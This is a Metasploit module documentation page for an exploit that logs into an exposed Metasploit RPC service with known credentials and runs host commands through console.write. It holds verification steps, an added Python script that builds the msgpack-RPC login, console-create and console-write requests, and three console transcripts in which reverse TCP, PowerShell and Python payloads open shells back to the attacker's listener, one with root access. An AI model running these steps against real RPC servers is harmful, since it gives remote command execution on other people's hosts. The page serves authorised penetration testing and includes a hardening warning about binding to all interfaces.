metasploit-gs/documentation/modules/exploit/multi/misc/msf_rpc_console.md

## Description
This module connects to a specified Metasploit RPC server, authenticates, creates a console and uses the *console.write* procedure to execute operating system commands. msfconsole hands an unrecognized command line to the host shell, so whatever is written to the console runs with the privileges of the user who started the RPC service. Valid credentials are required to access the RPC interface.
## Vulnerable Application
[Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.
To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole. Note that `ServerHost=0.0.0.0` binds the listener on every interface: anyone who can reach the port and knows the password gets command execution on the host, so use a strong password and bind to a loopback or management address when remote access is not needed.
This module has been tested successfully on:
* Metasploit 4.15 on Kali 1.0.6
* Metasploit 4.14 on Kali 2017.1
* Metasploit 4.14 on Windows 7 SP1
Source and Installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/misc/msf_rpc_console`
3. Do: `set RHOST [IP]`
4. Do: `set RPORT [PORT]` (default: `55552`)
5. Do: `set USERNAME [USERNAME]` (default: `msf`)
6. Do: `set PASSWORD [PASSWORD]`
7. Do: `set LHOST [IP]`
8. Do: `run`
9. You should get a session
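The three RPC calls behind the steps above (log in, create a console, write the command), shown as an added example that is not code from the module or from Metasploit. It assumes, beyond what this page states, that msfrpcd speaks msgpack-RPC over an HTTP POST to `/api/` with `Content-Type: binary/message-pack`, that a request is the msgpack array `[method, args...]` with the session token as the first argument of authenticated calls, and that replies are msgpack maps; the reply bodies below are constructed in that shape, and only the msgpack subset these calls need is implemented, so the script runs offline.

```python
"""msgpack-RPC exchange behind msf_rpc_console (added example, assumptions in the lead-in)."""
import struct


def mp_encode(obj):
    """Encode None/bool/int/str/list/dict as msgpack (the subset these calls use)."""
    if obj is None:
        return b"\xc0"
    if obj is True or obj is False:
        return b"\xc3" if obj else b"\xc2"
    if isinstance(obj, int) and 0 <= obj < 0x10000:
        return bytes([obj]) if obj < 0x80 else b"\xcd" + struct.pack(">H", obj)
    if isinstance(obj, str):
        d = obj.encode("utf-8")
        if len(d) < 0x20:
            return bytes([0xA0 | len(d)]) + d                  # fixstr
        return b"\xda" + struct.pack(">H", len(d)) + d         # str16
    if isinstance(obj, (list, tuple)):
        body = b"".join(mp_encode(x) for x in obj)
        head = bytes([0x90 | len(obj)]) if len(obj) < 0x10 else b"\xdc" + struct.pack(">H", len(obj))
        return head + body                                     # fixarray / array16
    if isinstance(obj, dict):
        body = b"".join(mp_encode(k) + mp_encode(v) for k, v in obj.items())
        head = bytes([0x80 | len(obj)]) if len(obj) < 0x10 else b"\xde" + struct.pack(">H", len(obj))
        return head + body                                     # fixmap / map16
    raise TypeError(f"unsupported value {obj!r}")


def _length(buf, pos, b, fixbase, mask):
    """Element count / byte length for a fix*, 8-bit or 16-bit header byte b."""
    if fixbase <= b <= fixbase | mask:
        return b & mask, pos
    if b in (0xCC, 0xD9):
        return buf[pos], pos + 1
    return struct.unpack(">H", buf[pos:pos + 2])[0], pos + 2


def mp_decode(buf, pos=0):
    """Decode one msgpack value at buf[pos]; return (value, next_pos)."""
    b = buf[pos]
    pos += 1
    if b < 0x80:                                               # positive fixint
        return b, pos
    if b in (0xC0, 0xC2, 0xC3):
        return {0xC0: None, 0xC2: False, 0xC3: True}[b], pos
    if b == 0xCC:                                              # uint8
        return buf[pos], pos + 1
    if b == 0xCD:                                              # uint16
        return struct.unpack(">H", buf[pos:pos + 2])[0], pos + 2
    if 0xA0 <= b < 0xC0 or b in (0xD9, 0xDA):                  # fixstr / str8 / str16
        n, pos = _length(buf, pos, b, 0xA0, 0x1F)
        return buf[pos:pos + n].decode("utf-8"), pos + n
    if 0x90 <= b < 0xA0 or b == 0xDC:                          # fixarray / array16
        n, pos = _length(buf, pos, b, 0x90, 0x0F)
        items = []
        for _ in range(n):
            item, pos = mp_decode(buf, pos)
            items.append(item)
        return items, pos
    if 0x80 <= b < 0x90 or b == 0xDE:                          # fixmap / map16
        n, pos = _length(buf, pos, b, 0x80, 0x0F)
        out = {}
        for _ in range(n):
            k, pos = mp_decode(buf, pos)
            out[k], pos = mp_decode(buf, pos)
        return out, pos
    raise ValueError(f"unsupported msgpack type byte 0x{b:02x}")


def rpc_body(method, *args):
    """Body of one RPC call: the msgpack array [method, args...]."""
    return mp_encode([method, *args])


def console_exec_requests(user, password, os_command, login_reply, create_reply):
    """The module's three calls in order, given the raw replies to the first two.
    Returns (token, console_id, [login_body, create_body, write_body])."""
    login = rpc_body("auth.login", user, password)
    token = mp_decode(login_reply)[0]["token"]                 # session token from the reply
    create = rpc_body("console.create", token)
    console_id = mp_decode(create_reply)[0]["id"]              # console number from the reply
    # msfconsole hands an unrecognised command line to the host shell, so writing
    # it to the console runs it as the user who started the RPC service.
    write = rpc_body("console.write", token, console_id, os_command + "\n")
    return token, console_id, [login, create, write]


if __name__ == "__main__":
    # Replies in the shape assumed for msfrpcd (constructed for this example).
    login_reply = mp_encode({"result": "success", "token": "TEMP" + "x" * 28})
    create_reply = mp_encode({"id": "0", "prompt": "msf > ", "busy": False})
    token, cid, reqs = console_exec_requests("msf", "abc123", "id", login_reply, create_reply)
    for body in reqs:                                          # what goes on the wire, decoded back
        print(mp_decode(body)[0])
```

Each returned body would be sent as the payload of one POST; the password is the only thing standing between an exposed listener and the `console.write` call, which is the point of the module.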
## Options
**USERNAME**
The username for Metasploit RPC (default: `msf`).
**PASSWORD**
The password for the RPC user.
## Scenarios
### Ruby Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 0
target => 0
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #0
[*] 172.16.191.166:55552 - Sending payload...
[*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400
whoami
win-sgbsd5tqutq\user
```
### Windows CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.166
rhost => 172.16.191.166
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 1
target => 1
msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp
payload => cmd/windows/powershell_reverse_tcp
msf exploit(msf_rpc_console) > run
[*] Started reverse SSL handler on 172.16.191.181:4444
[+] 172.16.191.166:55552 - Authenticated successfully
[*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
[*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
[*] 172.16.191.166:55552 - API version 1.0
[+] 172.16.191.166:55552 - Created console #1
[*] 172.16.191.166:55552 - Sending payload...
[*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400
Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\metasploit>whoami
win-sgbsd5tqutq\user
```
### Unix CMD Target
```
msf > use exploit/multi/misc/msf_rpc_console
msf exploit(msf_rpc_console) > set rhost 172.16.191.215
rhost => 172.16.191.215
msf exploit(msf_rpc_console) > set username msf
username => msf
msf exploit(msf_rpc_console) > set password abc123
password => abc123
msf exploit(msf_rpc_console) > set lhost 172.16.191.181
lhost => 172.16.191.181
msf exploit(msf_rpc_console) > set target 2
target => 2
msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
payload => cmd/unix/reverse_python
msf exploit(msf_rpc_console) > run
[*] Started reverse TCP handler on 172.16.191.181:4444
[+] 172.16.191.215:55552 - Authenticated successfully
[*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
[*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
[*] 172.16.191.215:55552 - API version 1.0
[+] 172.16.191.215:55552 - Created console #0
[*] 172.16.191.215:55552 - Sending payload...
[*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400
id
uid=0(root) gid=0(root) groups=0(root)
```